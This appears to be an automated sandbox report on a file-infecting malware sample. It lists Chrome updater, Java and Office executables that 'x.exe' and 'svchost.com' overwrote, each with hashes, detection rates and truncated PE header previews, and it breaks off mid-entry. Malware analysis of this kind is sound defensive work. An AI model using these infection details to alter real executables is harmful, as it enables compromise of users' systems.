                                      SSDEEP:3072:zr8WDrCz4qR8vSZksB+2hdqecER5AhC48S1m2YPrZ:Pu5ksB+0YlEXAe6QPt
                                      MD5:3782AA85B64BBBFD331D8170B86BCB0A
                                      SHA1:2FE109D8CDDC028910DC40DF789B90D8997B1557
                                      SHA-256:390F98A5B31D514641DFB13DDBCA0C071F4D8FD4F094C25859C98A672572B0C1
                                      SHA-512:D1DEBFF36BB931F544B48D611E0D513FFE7BA5A36650932F007B2C6198BDF8E4E1F253D0CCF24A25AF9066C5278EEEDA568EBA6FEE20B404377D4BB1A68253DF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1631792
                                      Entropy (8bit):7.974979800124763
                                      Encrypted:false
                                      SSDEEP:24576:TR1kyOX3l3PScicR9iK5vS8dU+0BeId7JfroHKExAuRBAHToF4rMTgZYhA5QR5sN:DkVX3lfrFfR0BecCqKBs+4o8YhAKi
                                      MD5:3D04EE3450C730CFDA46C28B33176F2E
                                      SHA1:DB5E017288EE49E5CC7486A5E4ADF2865D052451
                                      SHA-256:2DF36D4FB0D0CD7C14D58AD80CA0749A3D827FF6DB0C2E4D51587D9832FDC5DE
                                      SHA-512:8336B3A1CFAA2320BAF875950C8D83232184E8ECEA21F3B4E230BB15E2D93614B000D6458BBCB0A7D1F226764528C8E4D9A28CA826A712EFBCF9AAE4AA154A73
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1631792
                                      Entropy (8bit):7.974979800124763
                                      Encrypted:false
                                      SSDEEP:24576:TR1kyOX3l3PScicR9iK5vS8dU+0BeId7JfroHKExAuRBAHToF4rMTgZYhA5QR5sN:DkVX3lfrFfR0BecCqKBs+4o8YhAKi
                                      MD5:3D04EE3450C730CFDA46C28B33176F2E
                                      SHA1:DB5E017288EE49E5CC7486A5E4ADF2865D052451
                                      SHA-256:2DF36D4FB0D0CD7C14D58AD80CA0749A3D827FF6DB0C2E4D51587D9832FDC5DE
                                      SHA-512:8336B3A1CFAA2320BAF875950C8D83232184E8ECEA21F3B4E230BB15E2D93614B000D6458BBCB0A7D1F226764528C8E4D9A28CA826A712EFBCF9AAE4AA154A73
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):299136
                                      Entropy (8bit):6.7881128883409
                                      Encrypted:false
                                      SSDEEP:6144:PuGXLYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:xXEbH0j4x7R6SvyCMqn
                                      MD5:BB745A9E59BFDC3FED3D6ACC5EB1969E
                                      SHA1:B569EF5567BF533C49F4C59441D1881726DEA540
                                      SHA-256:5C257F423AFD510D6EE9EAB80273CC673995F966932466C9AD74EB2AA613A892
                                      SHA-512:B43198FC36F9DECB3767E6888B632093550394DF5D5826540A0BBDAE711931F595B398CE59C5F4676C1FDA7953C0702D57CC98D3E18309DEA517C536AB63CCCD
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):135808
                                      Entropy (8bit):6.38873877226639
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCGrmKJGyeVK7qjh3rmKPNbS7cZPxyqPEoCW/ids8nBs+s8nK:zr8WDrCGqzyutjZqMNbSgxbFrj8m
                                      MD5:3DFB05D09AB50A01B467398603BEADB5
                                      SHA1:D8A8AD789717B3E83608AE510FBFF096861DC271
                                      SHA-256:A4844081CA91828B55104253A954E3B073D6E762D66A4EFA8F22AF9C4D995833
                                      SHA-512:D6FD943FA97432F80CD81621D5186D7D6CB8F7622604278BE31CFEEBF98A46A9007E3C71F6E392B9B41563CA5BC6BD9B86AAA3D6A4CF1B148179D7692F7A9A99
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):299136
                                      Entropy (8bit):6.790537251287294
                                      Encrypted:false
                                      SSDEEP:6144:PuGkXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:xkXCs/YAh/elvhI7Wd
                                      MD5:57150329C07A1CCA1C715687BBD681A0
                                      SHA1:EA1805323441B728107A98C5C88EB1609116F70E
                                      SHA-256:AFB4A253B3CFEFB7FA8C8AAB7FE10060AF5A33C10147EDBA4501C5089F407023
                                      SHA-512:2BD0008D28BDBBBDB0F6A8D01121FFCF9A6AD18147110F100D1EB3CD7B93EC3481F8D0358E427F94D53F01764B246C54FC49F57CFDBAB1831672218197DFC444
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):437888
                                      Entropy (8bit):6.42435194722595
                                      Encrypted:false
                                      SSDEEP:12288:xXNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:hKiBLZ05jNTmJWExixM
                                      MD5:E96B5A5F7432CF95AC667CC32CAB7CE1
                                      SHA1:F5729409A0AD909360DD9938FE05681E8C98BEA7
                                      SHA-256:22345B680E235E582820160A73A5221A98550D7947DC1F22FE768C51788B3614
                                      SHA-512:BF03F48889EA86C4C39B32B32760FE57293D85C5E6A88D3695CF4D7F7AB23B3F4ED07588987619B084AFFB51A61B3C7404E2D8177A29EC4AF343FCBD66F7C560
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):163456
                                      Entropy (8bit):6.2758220261788
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCm446dewltB2mNd/HOrveW1dexk834fRZ5Nyc:Pum446d7T/H4X
                                      MD5:51117D59430CF4C0EA72319AD8930BED
                                      SHA1:0A7AB6E54B1F62D9FEE7F48A594AFD0E3F7ED846
                                      SHA-256:CE688EDA6A1F081C10E862422F2C13F24797F21D2DA248E85C0CC81D96BF3010
                                      SHA-512:E05E6DA3D9728F5E04F5F4D2BF9B875BEA8CCD287BA207B2469D83F49BB6AA759C608B29A107D33BF8460F71840EADAB34CB1924DA3EE8F9E5DE741FB45045BF
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):127104
                                      Entropy (8bit):6.059161475634893
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCds8nBs5s8nBskEsz2zy77hPxIAbBsnzA3QDkrDW8Kq5ns8w:zr8WDrCwUkEsqzy7pxI8BszFJqkb
                                      MD5:EF3C7B1D99C49F679F1DE40119454E82
                                      SHA1:E3869B9D17411A1DFB49630E8E9D0A379CCA1599
                                      SHA-256:4ECF5FCDD95ABA50DF6137D45EDB89467D33A31347525B422AA2A9B36809233B
                                      SHA-512:71D00F7B07E909CE5C54FBD85DDAAC2752B6B2AE2ED76EDADB4AA07AB1F7BDF25ECD77CB1742EEBAFBFA98087A4582879D4A2D277965D3D39F9E6ADEBA9170F5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):223360
                                      Entropy (8bit):6.084515656741608
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC+ySSyyXC2BZC5vHa2L8jv+UII6qS2AroAxYN35gwxcPXtxdTsVcCXFzlb:PuuSyMZOy406qS2AroAxnw6f9JCXN1
                                      MD5:278E935C540125EB737FF60459E06954
                                      SHA1:3F2F868109AB1BE159D75FE1FCB78D5AB0F39A29
                                      SHA-256:7DD8239708026320DC7B738BF5B1F90117475EBF88BE8DA06B99E6A3E860596F
                                      SHA-512:21E3181E34FCC0D304F5A8EEFA0B92B676DF815BE984792D034FEB61E3189D73020AD5B6D82A5DF2434CD97AB2D1F48AD223B7007695F0673A2ECA8803D2C825
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):203264
                                      Entropy (8bit):6.625450286768847
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC6wl0hzyfN7T34oshWGrAUdaz2w9Lf0M/RHym:Pu3iFIf34hcUsz225/
                                      MD5:241380ED43DD374CF6415E50B83CD0BD
                                      SHA1:5F4F79F4DBEB1201DFC3D3A83BB1D5400D11F045
                                      SHA-256:D3CA30B886E1F07EC6AC3989C091EBD5E97F1196D9BD554A2546EF3B4DF61EA4
                                      SHA-512:D4BF86E17996171B67900847372EFECDC41E7F87621F831FD882E8DEAE49F5A45B218E375AE2347E862C438C11906E2CC67E062A0BC2D1265C968789FA8F68E4
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):209912
                                      Entropy (8bit):6.335658991643739
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCUfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:PuUfSoD7q/fji2SUKz7VHwmmtj
                                      MD5:0DB388DA73178AB846638C787D1DD91E
                                      SHA1:64D79EC424EF95DE05D484C3BDC446642552879B
                                      SHA-256:E71DDCCD4996D121D5C7901A367E024266727C4C713635A25B74EB0C132CD59F
                                      SHA-512:94288DB9B2615FDA0BD27A46EEDBDB3F8FE3E8C2B2985D2B69244B47A7369AD5F357D060DE52FD4C5E9746CF7A3343417A77476A153F49058D8F8C2E61EBFB11
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):209912
                                      Entropy (8bit):6.335658991643739
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCUfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:PuUfSoD7q/fji2SUKz7VHwmmtj
                                      MD5:0DB388DA73178AB846638C787D1DD91E
                                      SHA1:64D79EC424EF95DE05D484C3BDC446642552879B
                                      SHA-256:E71DDCCD4996D121D5C7901A367E024266727C4C713635A25B74EB0C132CD59F
                                      SHA-512:94288DB9B2615FDA0BD27A46EEDBDB3F8FE3E8C2B2985D2B69244B47A7369AD5F357D060DE52FD4C5E9746CF7A3343417A77476A153F49058D8F8C2E61EBFB11
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):264144
                                      Entropy (8bit):5.859978790158535
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC2PEGT3EB2e1aWGNU6ITL85x0HRerzJ0YF6OYLy0PPDq29BA+7891:Pu2PEC0QjWGNU6ITL1H0zvjkBA+7891
                                      MD5:B2A0013F6770F98CD5D22419C506CD32
                                      SHA1:D1B9E2EBBE6255A386AFE69A9523B7D2BE1E05EA
                                      SHA-256:87C62BFBF6609662EE24C1B9FD1AB2CF261F68E5F1402CB7E2F6755023A29841
                                      SHA-512:3302A6D3AB1DC7CB725F4E0DA1A82ECEC7207C7CDF2050410625AFF4E51C17B3A38DB8630ED34E111344C66BC603C3939A46E52A3EE6E1EF282DB1E93E61036F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):430680
                                      Entropy (8bit):6.625803592345581
                                      Encrypted:false
                                      SSDEEP:6144:Puvmmt0fSoD7ZAOhPiURg/4KAaxZTTlvIfaUcuI4hWxBP9SGO0zyqEL:Pmt0LDdOUO42ZdocuI4kxBgGONqEL
                                      MD5:2463BF0CFD3790EACDB9BFCCA012D2D2
                                      SHA1:B3EAED3711C1A369A3359BD6ECEF26DDB824B9D2
                                      SHA-256:FD879B6629EBDFB190FAB80B29DEA52997A75FC44845749552815DA18EA07532
                                      SHA-512:494FAECC19D7B59548E04CA1CDDE618B9636ED3FC159D526ECC9E4F05DBDF0A96F3C0ABECD4B90BCC1ED7ACA57A9E38400CDCF06C19936D3407D3D5A10B9CC6B
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4473576
                                      Entropy (8bit):6.5697251244545924
                                      Encrypted:false
                                      SSDEEP:98304:9kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:9kkCqaE68eV+0y8E6L1
                                      MD5:A0E84CEDA4163F189BE5349FD432B1CB
                                      SHA1:204335080CD8BA8D46E52DFB29F1461D7BF84CA1
                                      SHA-256:9A8C97840B4745ABA6BE44CAE7DE9EC0E7960AE31E52DFDE4ACCB1C24B6C4DA7
                                      SHA-512:BE941C507F9A607087E96CDBA94358F4882BA231CC08E6AAE8480301A5FF82940630134F9DB780B9527F43DD83ABE5D4868759854D2517A6D6A87A26903FCC9F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4316096
                                      Entropy (8bit):3.9254629343592016
                                      Encrypted:false
                                      SSDEEP:98304:jPNLniBaEJhRELqS/rhwov59SRZ5Vb9sybbsK+0rnsQ:TNLniBPJhRELqS/rhb59SRZ5Vb9sybb9
                                      MD5:AB9C308CB62C689AEC4171AF74B99607
                                      SHA1:2AFBE3B52505B17653C30E8C51A8A434BB83433D
                                      SHA-256:5B23BCB1EB5124A1FA7160014A7BE5A546CAFE00AE7FFFCFB19C237552281499
                                      SHA-512:688D62C8CC8B7E699D379FE5FDA6DC808787E11C369C5CBDFA3559E2B61B607C0AF252232775BA04C2AD082C21DBA2224E6C34E131381EDD52EF0C2539C70484
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):94600
                                      Entropy (8bit):6.430762305801649
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCuELjOzHKd1XI/etzCJQx0cxnIO/IOmOe:zr8WDrCuE/OTKXI/etG8ICILJ
                                      MD5:29065F4177E1DFFC20CF409E15644D07
                                      SHA1:2A506101526624DF3C693E3F9501E7FD0332A5F3
                                      SHA-256:A572BFF875EA91F7324C87C4966ED38AE29C87A3B999E9EEDCF82730921F1AEA
                                      SHA-512:611B4D7DF2C4D2B37E6C152B0416A047166B78C999B1C7A6B39D11FE73CB80BA55F4822B9503642CB289730D90A608FA08DC909A845F77A8A13C967689A3C00B
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):142968
                                      Entropy (8bit):6.217019140684561
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCcvpz3ktxGvpzvy5ZWGalHFmMTK0KRTS8bOzxOxqjQ+P04wv:zr8WDrCKToATzvmN0KRm8bOzFr8WDrC
                                      MD5:27468177388C31213F942B92669A9CFB
                                      SHA1:550FF26E9634EEB3207CD34B90DED088004D7262
                                      SHA-256:B620C258E90FE86AB06EBAC3A21ABA853C89E75BA348106CEBAB6D4C50EDC039
                                      SHA-512:20EFA6E9B5792B85AC143957E50CF5493431A8A3EFCEBC06C6E77AE3D26D1BAFF68AD461E839D44312DAD6391AB83923DC0208FA304D6B9D21BBF1744F01E9D7
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):455760
                                      Entropy (8bit):5.9112226204404
                                      Encrypted:false
                                      SSDEEP:6144:Pu1wACThwS0vn9IdRsLGEJTdPA6lDfZNAGVx:iwACThwSSn2dRANtlF3j
                                      MD5:88735BCB5AD8B4C4EB20F420E2F3B73E
                                      SHA1:4B45EBC185EAB621105A0EABA9695AC709DC68A9
                                      SHA-256:2610D839A8603AA6425B0D0419998CDA3887CA444C0226A3546A436971B5EB53
                                      SHA-512:C21A7385053E5B20873BEBE7813B13F12BFF1AE4A4BEFA63F6AE9CC28C81E0B378D67DE541CE97E13065608018AA55F9CB337176C4739E7F7BC8879462241AD3
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):225704
                                      Entropy (8bit):6.245888252421863
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCNLqB8edYkIrv6TXRw9xwqazULDjkAJZo0RAjUIqXfkRC:PuRjilq8OPwRzso6AQ5yC
                                      MD5:58FCC2021F6669D332B12379F34E6ABA
                                      SHA1:C261CF77942748482EA6423B2816071BAC404855
                                      SHA-256:099D81B808C4A1507092974E4C79187470FC4D5BC1049DE99B7D87D68FFD8A8D
                                      SHA-512:2637E583059CA760EACB66649519751191FC96FD3589DE8E17D0AC73C957D9256A50105D03727D19A1193DFB61FF1450AD65DEEA8692EF2D947051D85062E8C1
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):84928
                                      Entropy (8bit):6.484542699354416
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCh67wZClMML07MiapFmPRHyzMwzobtM+zf:zr8WDrCh67wZClMMQ7MiawHyzMwsL
                                      MD5:6E3355F8734F6DA5FAC15DF47A197B0F
                                      SHA1:C933D5E414F6594D61E56FEC641373E33AD3C3ED
                                      SHA-256:052C62D09235DDD70A3C52C7071D20711F2D4F1F7F653AEA54FB023EC2626B12
                                      SHA-512:1B108643E2DF6476B167E233B7A3E249A2BCB89006B3C87FEEB90FC96214B52E0BC466C010AE03ED6BECF18864F96B0D5EED6F4720A1CDA70829B4631D3917FD
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):83816
                                      Entropy (8bit):6.536836051910162
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrC+0s7wZClMML072apFmPcnGzLHyxz5pOEtmwxz5E:zr8WDrC+t7wZClMMQ72ahnGzextQyxtE
                                      MD5:D713C72B72F2554BC5F57573AD79C596
                                      SHA1:82F518A57C167F1CFE80D7D43ED28084C2D57933
                                      SHA-256:22CC2A1543DC27CC8F1925ACB173E34141C4FF9E1A012C572E932BB6FD91B4C1
